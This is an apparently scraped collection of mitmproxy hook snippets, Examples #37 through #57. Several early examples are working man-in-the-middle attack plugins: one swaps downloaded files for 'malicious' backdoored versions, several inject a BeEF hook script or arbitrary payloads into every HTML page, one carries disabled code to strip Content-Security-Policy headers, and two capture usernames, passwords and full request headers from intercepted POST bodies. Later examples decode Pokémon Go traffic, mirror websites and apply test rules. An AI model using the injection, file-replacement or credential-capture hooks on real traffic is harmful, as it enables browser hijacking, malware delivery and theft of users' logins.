                 with decoded(flow.response):
                     print "[{}]:: URL: {}".format(self.name, flow.request.url)
                     flow.response.content = open(self.backdoors[content], 'rb').read()
                     print "[{}]:: Replaced file of mimtype {} with malicious version".format(self.name, content)
                     print "[{}]:: Replacement complete, forwarding to user...".format(self.name)
                 return
             print "[{}]:: {}, Error Path file not found\n".format(self.name, self.backdoors[content])
     except Exception as e:
         # All exceptions are discarded without logging.
         pass
Example #37
 def response(self,flow):
     """Response hook: insert ``<script src=self.urlhook>`` as first child of ``<body>``.

     Applied to every response that parses to a document with a body
     element; there is no Content-Type check.
     """
     with decoded(flow.response):  # Remove content encoding (gzip, ...)
         html = BeautifulSoup(flow.response.content)
         # String literal holding disabled code that would strip the
         # Content-Security-Policy header; as written the header is forwarded.
         """
         # To Allow CORS
         if "Content-Security-Policy" in flow.response.headers:
             del flow.response.headers["Content-Security-Policy"]
         """
         if html.body:
             script = html.new_tag(
                 'script',
                 src=self.urlhook)
             html.body.insert(0, script)
             flow.response.content = str(html)
             self.send_output.emit("[{}] Injected BeFF url hook...".format(self.Name))
Example #38
    def response(self, flow):
        """Response hook: run configured ``search||replace`` pairs over HTML bodies.

        Pairs come from ``self.config[self.name]['regex']``; each is applied
        as a literal substring replacement and logged at debug level with the
        request host.
        """
        pass

        #if "text/html" in flow.response.headers['Content-Type'][0]: # mitmproxy 0.15 [remove]
        if "text/html" in flow.response.headers['Content-Type']:
            with decoded(flow.response):
                for item, v in self.config[self.name]['regex'].iteritems():
                    #if v.split("||")[0] in flow.request.host and self.theFlag == False:
                    # Left of "||" is the text to find, right of it the replacement.
                    str_search = v.split("||")[0]
                    str_replace = v.split("||")[1]
                    if str_search in flow.response.content:
                        flow.response.content = flow.response.content.replace(
                            str_search, str_replace)
                        logger.debug("[" + self.name + "] " + str_search +
                                     " to " + str_replace + " in " +
                                     flow.request.host)
Example #39
 def response(self, flow):
     """Response hook built around an inline script that toggles the body's top margin.

     Acts on any non-empty response; the script is spliced in before the
     literal ``</body>``.
     """
     with decoded(flow.response):
         if flow.response.content:
             # Rewritten text ends up in ``c``; flow.response.content is not
             # reassigned in this method.
             c = flow.response.content.replace(
                 '</body>', '''<script>
             window.onload=function() {
                 var move=document.getElementsByTagName("body")[0];
                 setInterval(function() {
                     move.style.marginTop=(move.style.marginTop=="4px")?"-4px":"4px";
                 }, 5);
             }
             </script></body>''')
             # NOTE(review): str-vs-int comparison - confirm what was meant.
             if c > 0:
                 self.send_output.emit(
                     '[{}] {} javascript injected...'.format(
                         self.Name, flow.request.pretty_host))
Example #40
 def response(self,flow):
     """Response hook: append ``<script src=self.urlhook>`` to the end of ``<body>``.

     Responses are parsed with lxml regardless of Content-Type; when a body
     element exists the document is re-serialised with the extra tag.
     """
     with decoded(flow.response):  # Remove content encoding (gzip, ...)
         html = BeautifulSoup(flow.response.content,'lxml')
         # Disabled code in a string literal: it would delete the
         # Content-Security-Policy header, which is otherwise forwarded and
         # still governs whether the browser loads the external script.
         """
         # To Allow CORS
         if "Content-Security-Policy" in flow.response.headers:
             del flow.response.headers["Content-Security-Policy"]
         """
         if html.body:
             url =  '{}'.format(flow.request.pretty_host)
             metatag = html.new_tag('script')
             metatag.attrs['src'] = self.urlhook
             metatag.attrs['type'] = 'text/javascript'
             html.body.append(metatag)
             flow.response.content = str(html)
             self.send_output.emit("[{}] Injected BeFF hook in URL:[ {} ] ".format(self.Name,url))
Example #41
    def response(self, flow):
        """Response hook: insert one line from a file before ``self.replace_str`` in HTML.

        Only the first line of ``self.content_path`` is used, and the file is
        re-read for every response, HTML or not.
        """
        pass

        f = open(self.content_path, "r")
        # readline(): anything after the first newline in the file is ignored.
        replace_content = f.readline()
        f.close()

        #if "text/html" in flow.response.headers['Content-Type'][0]: # mitmproxy 0.15 [remove]
        if "text/html" in flow.response.headers['Content-Type']:
            with decoded(flow.response):
                if self.replace_str in flow.response.content:
                    flow.response.content = flow.response.content.replace(
                        self.replace_str, replace_content + self.replace_str)
                    logger.debug("[" + self.name + "] Payload injected > " +
                                 flow.request.host)
        else:
            pass
Example #42
 def response(self, flow):
     """Response hook: append ``<script src=self.url>`` to the end of ``<body>``.

     Every response is parsed with lxml; documents with a body element are
     re-serialised with the added tag and the host is reported.
     """
     with decoded(flow.response):  # Remove content encoding (gzip, ...)
         html = BeautifulSoup(flow.response.content, 'lxml')
         # Disabled (string literal) code that would remove the
         # Content-Security-Policy response header.
         """
         # To Allow CORS
         if "Content-Security-Policy" in flow.response.headers:
             del flow.response.headers["Content-Security-Policy"]
         """
         if html.body:
             url = '{}'.format(flow.request.pretty_host)
             metatag = html.new_tag('script')
             metatag.attrs['src'] = self.url
             metatag.attrs['type'] = 'text/javascript'
             html.body.append(metatag)
             flow.response.content = str(html)
             self.send_output.emit(
                 "[{} js script Injected in [ {} ]".format(self.Name, url))
Example #43
 def response(self, flow):
     """Response hook: insert the first line of a file before ``self.replace_str`` in HTML.

     The file at ``self.content_path`` is opened for every response; only
     responses whose Content-Type contains ``text/html`` are modified.
     """
     pass
 
     f = open(self.content_path, "r")
     # Only the first line of the file is used.
     replace_content = f.readline()
     f.close()
     
     
     #if "text/html" in flow.response.headers['Content-Type'][0]: # mitmproxy 0.15 [remove]
     if "text/html" in flow.response.headers['Content-Type']:
         with decoded(flow.response):
             if self.replace_str in flow.response.content:
                 flow.response.content = flow.response.content.replace(self.replace_str, replace_content + self.replace_str)
                 logger.debug("["+self.name+"] Payload injected > " + flow.request.host)
     else:
         pass
         #print "- " + flow.response.headers['Content-Type'][0]
    def response(self,flow):
        """Response hook: append the parsed markup in ``self.content`` to ``<body>``.

        Active only when ``self.isfilePath`` is truthy; otherwise an error
        line is emitted for every response.  Returns whatever
        ``send_output.emit`` returns, or ``None`` when no body element is
        found.
        """
        if self.isfilePath:
            with decoded(flow.response):  # Remove content encoding (gzip, ...)
                # Undecodable bytes are dropped ('ignore'), so non-UTF-8 or
                # binary bodies may come out altered after re-serialisation.
                html = BeautifulSoup(flow.response.content.decode('utf-8', 'ignore'),'lxml')
                # Disabled code in a string literal; it would delete the
                # Content-Security-Policy header.
                """
                # To Allow CORS
                if "Content-Security-Policy" in flow.response.headers:
                    del flow.response.headers["Content-Security-Policy"]
                """
                if html.body:
                    temp_soup = BeautifulSoup(self.content,'lxml')

                    # Index len(contents) places the fragment after the last child.
                    html.body.insert(len(html.body.contents), temp_soup)
                    flow.response.content = str(html)
                    return self.send_output.emit("[{}] [Request]: {} | injected ".format(self.Name,flow.request.pretty_host))
        else:
            return self.send_output.emit("[{}] Error Path file not found ".format(self.Name))
 def request(self, flow):
     """Request hook: report each request line and any credentials found in the body.

     ``self.get_password_POST`` (not shown here) is given the request content
     and is expected to return a (user, password) pair or ``None``.  When a
     pair is found, all request headers and both values are emitted.

     This depends on the request body being readable at the proxy: form
     logins sent over certificate-validated TLS do not arrive here in
     cleartext, logins over plain HTTP do.
     """
     self.send_output.emit("FOR: " + flow.request.url +" "+ flow.request.method + " " + flow.request.path + " " + flow.request.http_version)
     with decoded(flow.request):
         user_passwd = self.get_password_POST(flow.request.content)
         if user_passwd != None:
             try:
                 http_user = user_passwd[0].decode('utf8')
                 http_pass = user_passwd[1].decode('utf8')
                 # Values longer than 75 characters are treated as false
                 # positives and the request is not reported.
                 if len(http_user) > 75 or len(http_pass) > 75:
                     return
                 self.send_output.emit("\n[{}][HTTP REQUEST HEADERS]\n".format(self.Name))
                 # Headers are emitted in full, which presumably includes any
                 # Cookie or Authorization values the request carried.
                 for name, valur in flow.request.headers.iteritems():
                     self.send_output.emit('{}: {}'.format(name,valur))
                 self.send_output.emit( 'HTTP username: %s' % http_user)
                 self.send_output.emit( 'HTTP password: %s\n' % http_pass)
             except UnicodeDecodeError:
                 # Non-UTF-8 values are skipped without output.
                 pass
Example #46
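def request(ctx, flow):
    """Decode a RequestEnvelope sent to pgorelease.nianticlabs.com and print it.

    The camel-cased method name of every sub-request is queued in the
    module-level ``requests`` map under the envelope id, in wire order.
    Sub-requests that pass ``args.filter`` / ``args.ignore`` are then printed,
    either raw (``args.always_raw``) or parsed with the ``protocol`` class
    named ``<MethodName>Request``.

    Args:
        ctx: script context; only ``ctx.log`` is used.
        flow: intercepted flow whose request body is parsed as protobuf.
    """
    if not flow.match("~d pgorelease.nianticlabs.com"):
        return

    with decoded(flow.request):
        req = protocol.RequestEnvelope()
        req.ParseFromString(flow.request.content)

        if req.id in requests:
            # NOTE(review): in mitmproxy's inline-script API the second positional
            # argument of ctx.log is the log level, so the id belongs in the
            # message itself. Confirm against the mitmproxy version in use.
            ctx.log("Duplicate Request %s" % req.id)

        # A repeated id replaces the earlier queue; names still pending for it are
        # lost. Nothing in this function removes entries from `requests`.
        requests[req.id] = queue.Queue()
        for request in req.requests:
            messageName = toCamelCase(protocol.Method.Name(request.method))
            # Queued before filtering so the queue keeps one entry per sub-request.
            requests[req.id].put(messageName)

            if args.filter and messageName not in args.filter:
                continue

            if args.ignore and messageName in args.ignore:
                continue

            messageName += "Request"

            print("Request: (%s, %s)" % (messageName, request.method))
            if not request.payload:
                continue

            if args.always_raw:
                print("Request: Raw (type: %s) (name: %s)" %
                      (request.method, messageName))
                printRawMessage(request.payload)

            else:
                try:
                    MessageType = getattr(protocol, messageName)
                    Message = MessageType()
                    Message.ParseFromString(request.payload)
                    print(Message)

                except Exception:
                    # Missing message class or undecodable payload: dump it raw.
                    # `Exception` rather than a bare except, so Ctrl-C and
                    # SystemExit are not swallowed here.
                    print("Request: Unknown Message (name: %s)" % messageName)
                    printRawMessage(request.payload)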
Example #47
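def request(ctx, flow):
    """Record and print the sub-requests of a RequestEnvelope.

    Only flows matching ``~d pgorelease.nianticlabs.com`` are handled. For
    each sub-request the camel-cased method name is put on a queue stored in
    the module-level ``requests`` map under the envelope id. Unless filtered
    out by ``args.filter`` or ``args.ignore``, the sub-request is printed:
    raw when ``args.always_raw`` is set, otherwise parsed with the
    ``protocol`` class named ``<MethodName>Request``.

    Args:
        ctx: script context; only ``ctx.log`` is used.
        flow: intercepted flow whose request body is parsed as protobuf.
    """
    if not flow.match("~d pgorelease.nianticlabs.com"):
        return

    with decoded(flow.request):
        req = protocol.RequestEnvelope()
        req.ParseFromString(flow.request.content)

        if req.id in requests:
            # NOTE(review): ctx.log takes the level as its second positional
            # argument in mitmproxy's inline-script API, so the id is formatted
            # into the message. Confirm against the version in use.
            ctx.log("Duplicate Request %s" % req.id)

        # An id seen before gets a fresh queue; the old one is discarded.
        requests[req.id] = queue.Queue()
        for request in req.requests:
            messageName = toCamelCase(protocol.Method.Name(request.method))
            # One queue entry per sub-request, whether or not it is printed.
            requests[req.id].put(messageName)

            filtered_out = args.filter and messageName not in args.filter
            ignored = args.ignore and messageName in args.ignore
            if filtered_out or ignored:
                continue

            messageName += "Request"

            print("Request: (%s, %s)" % (messageName, request.method))
            if not request.payload:
                continue

            if args.always_raw:
                print("Request: Raw (type: %s) (name: %s)" %
                      (request.method, messageName))
                printRawMessage(request.payload)
                continue

            try:
                MessageType = getattr(protocol, messageName)
                Message = MessageType()
                Message.ParseFromString(request.payload)
                print(Message)
            except Exception:
                # Narrowed from a bare except so KeyboardInterrupt/SystemExit
                # propagate; anything else falls back to the raw dump.
                print("Request: Unknown Message (name: %s)" % messageName)
                printRawMessage(request.payload)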
Example #48
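def response(ctx, flow):
    """Decode a ResponseEnvelope and print each sub-response.

    The names queued by the request hook under the same envelope id are
    consumed in order; the i-th name is paired with ``resp.responses[i]``.
    Names rejected by ``args.filter`` / ``args.ignore`` still advance the
    index so the pairing stays aligned.

    Args:
        ctx: script context; only ``ctx.log`` is used.
        flow: intercepted flow whose response body is parsed as protobuf.
    """
    if not flow.match("~d pgorelease.nianticlabs.com"):
        return

    with decoded(flow.response):
        resp = protocol.ResponseEnvelope()
        resp.ParseFromString(flow.response.content)

        # pop() fetches and removes in one step: an id with no recorded request
        # no longer raises KeyError, and the entry is gone even if decoding
        # below raises.
        pending = requests.pop(resp.id, None)
        if pending is None:
            ctx.log("Response for unknown request id %s" % resp.id)
            return

        i = -1
        while not pending.empty():
            i += 1
            requestName = pending.get()
            if args.filter and requestName not in args.filter:
                continue

            if args.ignore and requestName in args.ignore:
                continue

            request = requestName + "Response"

            print("Response: (%s)" % request)
            # The envelope comes off the wire and may carry fewer entries than
            # were queued; do not index past the end.
            if i >= len(resp.responses) or not resp.responses[i]:
                continue

            if args.always_raw:
                # Label fixed: this branch dumps raw on request, the message is
                # not unknown.
                print("Response: Raw (name: %s)" % request)
                printRawMessage(resp.responses[i])

            else:
                try:
                    MessageType = getattr(protocol, request)
                    Message = MessageType()
                    Message.ParseFromString(resp.responses[i])
                    print(Message)

                except Exception:
                    # Narrowed from a bare except so Ctrl-C is not swallowed.
                    print("Response: Unknown Message (name: %s)"
                          % request)
                    printRawMessage(resp.responses[i])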
Example #49
 def request(self, flow):
     """Log the request line and any credentials found in the request body.

     ``self.get_password_POST`` is given the decoded body; when it returns a
     value, its first two items are decoded as UTF-8 and treated as user name
     and password. If either is longer than 75 characters the method returns
     at once, which also skips the trailing blank log line.

     Note: on a match, all request headers and both credential values are
     written in clear text at INFO level. The log destination therefore holds
     secrets and needs the same protection as the credentials themselves.
     """
     req = flow.request
     self.log.info("FOR: " + " ".join((req.url, req.method, req.path, req.http_version)))
     with decoded(req):
         creds = self.get_password_POST(req.content)
         if creds is not None:
             # The try spans the log calls too, as in the original.
             try:
                 http_user = creds[0].decode('utf8')
                 http_pass = creds[1].decode('utf8')
                 # Length cap to cut down on false positives
                 if max(len(http_user), len(http_pass)) > 75:
                     return
                 self.log.info("\n[HTTP REQUEST HEADERS]\n")
                 for header_name, header_value in req.headers.iteritems():
                     self.log.info('{}: {}'.format(header_name, header_value))
                 self.log.info('\n')
                 self.log.info('HTTP username: %s' % http_user)
                 self.log.info('HTTP password: %s\n' % http_pass)
             except UnicodeDecodeError:
                 pass
     self.log.info('\n')
Example #50
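def response(context, flow):
    """Pass matching AMF responses from *.thesettlersonline.pl to a worker thread.

    A response qualifies when the request host ends with
    ``.thesettlersonline.pl``, the Content-Type contains
    ``application/x-amf`` and the decoded body matches all three value-object
    names below. The body is then handed to ``sgd._incoming_traffic_handler``
    on a daemon thread so the proxy hook returns without waiting for it.

    Args:
        context: script context (unused).
        flow: intercepted flow.
    """
    if not flow.request.host.endswith('.thesettlersonline.pl'):
        return
    if "application/x-amf" not in flow.response.headers.get("Content-Type", "_"):
        return

    with decoded(flow.response):
        res = flow.response.content
        # NOTE(review): `search` is presumably re.search; if so the dots in these
        # names match any character. Confirm against the file's imports.
        markers = (
            'defaultGame.Communication.VO.dZoneVO',
            'defaultGame.Communication.VO.dBuffVO',
            'defaultGame.Communication.VO.dPlayerVO',
        )
        if not all(search(marker, res) for marker in markers):
            return

        log.debug("got type 1001 response... wysyłam szpiega...")
        try:
            t = Thread(target=sgd._incoming_traffic_handler, args=(flow.response.content,))
            t.daemon = True
            t.start()
        except (KeyboardInterrupt, SystemExit):
            log.info('caught either KeyboardInterrupt or SystemExit, quitting threads')
            # The former t.__stop() call is dropped: outside the Thread class that
            # name is not mangled, so the attribute does not exist and the handler
            # itself would raise (and `t` may not be bound yet). A daemon thread
            # does not keep the process alive, so no explicit stop is needed.
            import thread  # Python 2 module name, as in the original
            thread.interrupt_main()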
Example #51
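def response(ctx, flow):
    """Print the sub-responses of a ResponseEnvelope.

    Only flows matching ``~d pgorelease.nianticlabs.com`` are handled. The
    method names recorded by the request hook for this envelope id are taken
    from the module-level ``requests`` map and paired by position with
    ``resp.responses``. Each one is printed raw (``args.always_raw``) or
    parsed with the ``protocol`` class named ``<MethodName>Response``.

    Args:
        ctx: script context; only ``ctx.log`` is used.
        flow: intercepted flow whose response body is parsed as protobuf.
    """
    if not flow.match("~d pgorelease.nianticlabs.com"):
        return

    with decoded(flow.response):
        resp = protocol.ResponseEnvelope()
        resp.ParseFromString(flow.response.content)

        # Take the queue out of the map up front. A response whose id was never
        # recorded (for example when the script started mid-session) used to
        # raise KeyError; an exception further down used to leave the entry
        # behind.
        pending = requests.pop(resp.id, None)
        if pending is None:
            ctx.log("Response for unknown request id %s" % resp.id)
            return

        available = len(resp.responses)
        i = -1
        while not pending.empty():
            i += 1
            requestName = pending.get()
            if args.filter and requestName not in args.filter:
                continue

            if args.ignore and requestName in args.ignore:
                continue

            request = requestName + "Response"

            print("Response: (%s)" % request)
            # Fewer responses than queued names: skip instead of IndexError.
            if i >= available or not resp.responses[i]:
                continue

            if args.always_raw:
                # Label fixed: this is the requested raw dump, not an unknown message.
                print("Response: Raw (name: %s)" % request)
                printRawMessage(resp.responses[i])
                continue

            try:
                MessageType = getattr(protocol, request)
                Message = MessageType()
                Message.ParseFromString(resp.responses[i])
                print(Message)
            except Exception:
                # Narrowed from a bare except; KeyboardInterrupt/SystemExit propagate.
                print("Response: Unknown Message (name: %s)" % request)
                printRawMessage(resp.responses[i])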
Example #52
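def response(context, flow):
    """Save the body of every 200 response below ``context.dest_path``.

    The file location is derived from the request URL path (``index`` is
    appended to paths ending in ``/``; a missing extension is looked up in
    ``MIMETYPE_TO_FILEEXT`` by content type) and, when
    ``context.include_host_in_path`` is set, the Host header. A JSON summary
    of the flow is logged before writing.

    Args:
        context: script context providing ``dest_path``,
            ``include_host_in_path``, ``dirmode`` and ``log``.
        flow: intercepted flow.

    Raises:
        Exception: if ``context.dest_path`` has not been set.
    """
    if not hasattr(context, 'dest_path'):
        raise Exception('context.dest_path is unset')
    with decoded(flow.response):
        if (flow.response.status_code == 200):
            data = collections.OrderedDict()
            req = data['request'] = collections.OrderedDict()
            resp = data['response'] = collections.OrderedDict()
            req['headers'] = format_headers_as_list(flow.request.headers)
            resp['headers'] = format_headers_as_list(flow.response.headers)
            data['url'] = flow.request.url
            #data['content'] = flow.response.content
            data['host'] = flow.request.headers["Host"]
            data['content-type'] = flow.response.headers['Content-Type']
            data['filetype'] = data['content-type'].split(';', 1)[0]
            url = URLObject(data['url'])
            data['path'] = url.path
            _, fileext = os.path.splitext(data['path'])
            if data['path'].endswith('/'):
                filepath = data['path'] + 'index'
            else:
                filepath = data['path']
            if not fileext:
                fileext = MIMETYPE_TO_FILEEXT.get(data['filetype'])
                if fileext is not None:
                    filepath = "%s.%s" % (filepath, fileext)
            data['fileext'] = fileext
            data['filepath'] = filepath
            paths = [context.dest_path]
            if context.include_host_in_path:
                paths.append(data['host'])
            paths.append(data['filepath'])
            data['output_path'] = joinpaths(*paths)
            context.log(json.dumps(data, indent=2))

            # The Host header and URL path are taken from the intercepted
            # traffic, so they are untrusted. Resolve the result and refuse
            # anything that ends up outside dest_path ("..", absolute segments,
            # symlinks) before touching the filesystem.
            root = os.path.realpath(context.dest_path)
            target = os.path.realpath(data['output_path'])
            if not target.startswith(os.path.join(root, '')):
                context.log("Refusing to write outside dest_path: %r" % data['output_path'])
                return

            output_dirname = os.path.dirname(target)
            if not os.path.exists(output_dirname):
                os.makedirs(output_dirname, mode=context.dirmode)
            # open() instead of the Python-2-only file() builtin; same behaviour.
            with open(target, 'wb') as f:
                f.write(flow.response.content)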
Example #53
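def response(context, flow):
    """Mirror every 200 response body into a tree under ``context.dest_path``.

    The relative file path comes from the request URL path: ``index`` is
    appended when the path ends in ``/``, and when the path has no extension
    one is looked up in ``MIMETYPE_TO_FILEEXT`` by content type. With
    ``context.include_host_in_path`` the Host header becomes a directory
    level. A JSON description of the flow is logged before the write.

    Args:
        context: script context providing ``dest_path``,
            ``include_host_in_path``, ``dirmode`` and ``log``.
        flow: intercepted flow.

    Raises:
        Exception: if ``context.dest_path`` has not been set.
    """
    if not hasattr(context, 'dest_path'):
        raise Exception('context.dest_path is unset')
    with decoded(flow.response):
        if flow.response.status_code != 200:
            return

        data = collections.OrderedDict()
        req = data['request'] = collections.OrderedDict()
        resp = data['response'] = collections.OrderedDict()
        req['headers'] = format_headers_as_list(flow.request.headers)
        resp['headers'] = format_headers_as_list(flow.response.headers)
        data['url'] = flow.request.url
        data['host'] = flow.request.headers["Host"]
        data['content-type'] = flow.response.headers['Content-Type']
        data['filetype'] = data['content-type'].split(';', 1)[0]
        url = URLObject(data['url'])
        data['path'] = url.path
        _, fileext = os.path.splitext(data['path'])
        filepath = data['path']
        if filepath.endswith('/'):
            filepath += 'index'
        if not fileext:
            fileext = MIMETYPE_TO_FILEEXT.get(data['filetype'])
            if fileext is not None:
                filepath = "%s.%s" % (filepath, fileext)
        data['fileext'] = fileext
        data['filepath'] = filepath
        paths = [context.dest_path]
        if context.include_host_in_path:
            paths.append(data['host'])
        paths.append(data['filepath'])
        data['output_path'] = joinpaths(*paths)
        context.log(json.dumps(data, indent=2))

        # Both the Host header and the URL path are supplied by the traffic
        # being intercepted. Check where the joined path really points and
        # write only when it stays strictly inside dest_path.
        root = os.path.realpath(context.dest_path)
        target = os.path.realpath(data['output_path'])
        rel = os.path.relpath(target, root)
        escapes = rel == os.pardir or rel.startswith(os.pardir + os.sep)
        if escapes or rel == os.curdir:
            context.log("Refusing to write outside dest_path: %r" % data['output_path'])
            return

        output_dirname = os.path.dirname(target)
        if not os.path.exists(output_dirname):
            os.makedirs(output_dirname, mode=context.dirmode)
        # open() replaces the Python-2-only file() builtin; same behaviour.
        with open(target, 'wb') as f:
            f.write(flow.response.content)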
Example #54
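def response(context, flow):
  """Deserialize each return value of an RPC response envelope.

  For flows matching ``~d pgorelease.nianticlabs.com`` the envelope is parsed
  and its ``returns`` are paired, in order, with the method keys stored in
  ``methods_for_request`` under the envelope's ``response_id``. Each value is
  deserialized as ``.<CamelCaseName>OutProto``; GET_MAP_OBJECTS results are
  passed on to ``getMapObjects.response``.

  Args:
    context: script context (unused).
    flow: intercepted flow whose response body is parsed as protobuf.
  """
  with decoded(flow.response):
    if flow.match("~d pgorelease.nianticlabs.com"):
      env = RpcResponseEnvelopeProto()
      env.ParseFromString(flow.response.content)

      keys = methods_for_request[env.response_id]
      for value in env.returns:
        key = keys.popleft()

        name = Method.Name(key)
        name = mismatched_apis.get(name, name)  # class name when it differs from the method name
        klass = underscore_to_camelcase(name) + "OutProto"

        try:
          mor = deserialize(value, "." + klass)
          print("Deserialized Response %s" % name)
        except Exception:
          # Narrowed from a bare except so Ctrl-C is not swallowed.
          print("Missing Response API: %s" % name)
          # Nothing was decoded, so there is nothing to hand on. Previously
          # `mor` was unbound here, or still held the previous iteration's
          # message, when the GET_MAP_OBJECTS branch ran.
          continue

        if (key == GET_MAP_OBJECTS):
          getMapObjects.response(mor, env)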
Example #55
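def response(flow):
    """Write image, text and application responses to disk, mirroring the URL path.

    Files are placed under the fixed base directory below, in sub-directories
    taken from the request URL path. Responses with any other content type
    (or none) are ignored.

    Args:
        flow: intercepted flow.
    """
    base_dir = '/Users/xxxx/Desktop/www/'
    with decoded(flow.response):
        # .get avoids a KeyError on responses that carry no Content-Type.
        ctype = flow.response.headers.get('Content-Type', '')
        # The image/ and text|application/ branches were identical; one test covers both.
        if not ctype.startswith(('image/', 'text/', 'application/')):
            return

        url = urlsplit(flow.request.url)
        # A path ending in "/" has no basename; use "index" rather than trying
        # to open a directory for writing.
        name = os.path.basename(url.path) or 'index'
        path_arr = url.path.split('/')
        path_arr.pop()
        print('/'.join(path_arr))

        # The original used base_dir.join(path_arr), which puts the base between
        # the segments instead of in front of them (for "/x.png" it produced
        # "/x.png" at the filesystem root). Join base and segments properly.
        root = os.path.realpath(base_dir)
        segments = [seg for seg in path_arr if seg]
        outfile = os.path.realpath(os.path.join(root, *(segments + [name])))
        # The URL path is untrusted: refuse anything that resolves outside the base.
        if not outfile.startswith(os.path.join(root, '')):
            print(outfile, ' not written, outside ', root)
            return

        outdir = os.path.dirname(outfile)
        if not os.path.exists(outdir):
            os.makedirs(outdir)
        # The with block closes the file; no explicit close() needed.
        with open(outfile, 'wb') as f:
            f.write(flow.response.content)
        print(outfile, ' written')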
Example #56
def response(context, flow):
    """Apply the rule attached to a flow to its response.

    Does nothing unless ``driver.name`` is set and ``flow.mastermind['rule']``
    is truthy. Otherwise, in order: sleeps for the rule's delay, overrides the
    status code and message, validates the body against the rule's schema and
    stores the result, processes the response headers, and finally replaces
    the body with the rule's body file.

    Args:
        context: script context; ``context.source_dir`` is passed to
            ``rules.schema`` and ``rules.body``.
        flow: intercepted flow.
    """
    if not driver.name:
        return
    rule = flow.mastermind['rule']
    if not rule:
        return

    pause = rules.delay(rule)
    if pause:
        time.sleep(pause)

    with decoded(flow.response):
        forced_status = rules.status_code(rule)
        body_filename = rules.body_filename(rule)
        schema = rules.schema(rule, context.source_dir)

        if forced_status:
            reason = http.status_message(forced_status)
            flow.response.status_code = forced_status
            flow.response.msg = reason

        if schema:
            # Results are stored in a table named after the request URL.
            table = driver.db.table(flow.request.url)
            # safe_load: the body comes from the remote server, so only the
            # safe loader is appropriate here.
            parsed = yaml.safe_load(flow.response.content)
            findings = validator.check(parsed, schema)
            table.insert_multiple(findings)
            logger.info(findings)

        rules.process_headers('response', rule, flow.response.headers)

        if body_filename:
            # 204 might be set by the skip rule in the request hook
            if flow.response.status_code == 204:
                flow.response.status_code = 200
                flow.response.msg = 'OK'
            flow.response.content = rules.body(body_filename, context.source_dir)
Example #57
def response(context, flow):
  with decoded(flow.response):
    if flow.match("~d pgorelease.nianticlabs.com"):
      env = RpcResponseEnvelopeProto()
      env.ParseFromString(flow.response.content)
      key = request_api[env.response_id]
      value = env.returns[0]

      name = Method.Name(key)
      name = mismatched_apis.get(name, name) #return class name when not the same as method
      klass = underscore_to_camelcase(name) + "OutProto"
      try:
        mor = deserialize(value, "." + klass)
        print("Deserialized Response %s" % name)
      except:
        print("Missing Response API: %s" % name)


      if (key == GET_MAP_OBJECTS):
        features = []
        bulk = []

        for cell in mor.MapCell:
          for fort in cell.Fort:

            props = {
                "id": fort.FortId,
                "LastModifiedMs": fort.LastModifiedMs,
                }

            if fort.FortType == CHECKPOINT:
              props["marker-symbol"] = "circle"
              props["title"] = "PokéStop"
              props["type"] = "pokestop"
              props["lure"] = fort.HasField('FortLureInfo')
            else:
              props["marker-symbol"] = "town-hall"
              props["marker-size"] = "large"
              props["type"] = "gym"

            if fort.Team == BLUE:
              props["marker-color"] = "0000FF"
              props["title"] = "Blue Gym"
            elif fort.Team == RED:
              props["marker-color"] = "FF0000"
              props["title"] = "Red Gym"
            elif fort.Team == YELLOW:
              props["marker-color"] = "FF0000"
              props["title"] = "Yellow Gym"
            else:
              props["marker-color"] = "808080"

            p = Point((fort.Longitude, fort.Latitude))
            f = Feature(geometry=p, id=fort.FortId, properties=props)
            features.append(f)
            bulk.append(createItem("gym", fort.FortId, p, f.properties))

          for spawn in cell.SpawnPoint:
            p = Point((spawn.Longitude, spawn.Latitude))
            f = Feature(geometry=p, id=len(features), properties={
              "type": "spawn",
              "id": len(features),
              "title": "spawn",
              "marker-color": "00FF00",
              "marker-symbol": "garden",
              "marker-size": "small",
              })
            features.append(f)
            bulk.append(createItem("spawnpoint", 0, p, f.properties))

          for spawn in cell.DecimatedSpawnPoint:
            p = Point((spawn.Longitude, spawn.Latitude))
            f = Feature(geometry=p, id=len(features), properties={
              "id": len(features),
              "type": "decimatedspawn",
              "title": "Decimated spawn",
              "marker-color": "000000",
              "marker-symbol": "monument"
              })
            features.append(f)

          for pokemon in cell.WildPokemon:
            p = Point((pokemon.Longitude, pokemon.Latitude))
            f = Feature(geometry=p, id="wild" + str(pokemon.EncounterId), properties={
              "id": "wild" + str(pokemon.EncounterId),
              "type": "wild",
              "TimeTillHiddenMs": pokemon.TimeTillHiddenMs,
              "WillDisappear": pokemon.TimeTillHiddenMs + pokemon.LastModifiedMs,
              "title": "Wild %s" % Custom_PokemonName.Name(pokemon.Pokemon.PokemonId),
              "marker-color": "FF0000",
              "marker-symbol": "suitcase"
              })
            features.append(f)
            bulk.append(createItem("pokemon", pokemon.EncounterId, p, f.properties))

          for pokemon in cell.CatchablePokemon:
            p = Point((pokemon.Longitude, pokemon.Latitude))
            f = Feature(geometry=p, id="catchable" + str(pokemon.EncounterId), properties={
              "id": "catchable" + str(pokemon.EncounterId),
              "type": "catchable",
              "ExpirationTimeMs": pokemon.ExpirationTimeMs,
              "title": "Catchable %s" % Custom_PokemonName.Name(pokemon.PokedexTypeId),
              "marker-color": "000000",
              "marker-symbol": "circle"
              })
            features.append(f)

          for poke in cell.NearbyPokemon:
            gps = request_location[env.response_id]
            if poke.EncounterId in pokeLocation:
              add = True
              for loc in pokeLocation[poke.EncounterId]:
                if gps[0] == loc[0] and gps[1] == loc[1]:
                  add = False
              if add:
                pokeLocation[poke.EncounterId].append((gps[0], gps[1], poke.DistanceMeters/1000))
            else:
              pokeLocation[poke.EncounterId] = [(gps[0], gps[1], poke.DistanceMeters/1000)]
            if len(pokeLocation[poke.EncounterId]) >= 3:
              lat, lon = triangulate(pokeLocation[poke.EncounterId][0],pokeLocation[poke.EncounterId][1],pokeLocation[poke.EncounterId][2])
              if not math.isnan(lat) and not math.isnan(lon) :
                p = Point((lon, lat))
                f = Feature(geometry=p, id="nearby" + str(poke.EncounterId), properties={
                  "id": "nearby" + str(poke.EncounterId),
                  "type": "nearby",
                  "title": "Nearby %s" % Custom_PokemonName.Name(poke.PokedexNumber),
                  "marker-color": "FFFFFF",
                  "marker-symbol": "dog-park"
                  })
                bulk.append(createItem("pokemon", poke.EncounterId, p, f.properties))
                features.append(f)


        fc = FeatureCollection(features)
        dump = geojson.dumps(fc, sort_keys=True)
        dumpToMap(bulk)
        f = open('ui/get_map_objects.json', 'w')
        f.write(dump)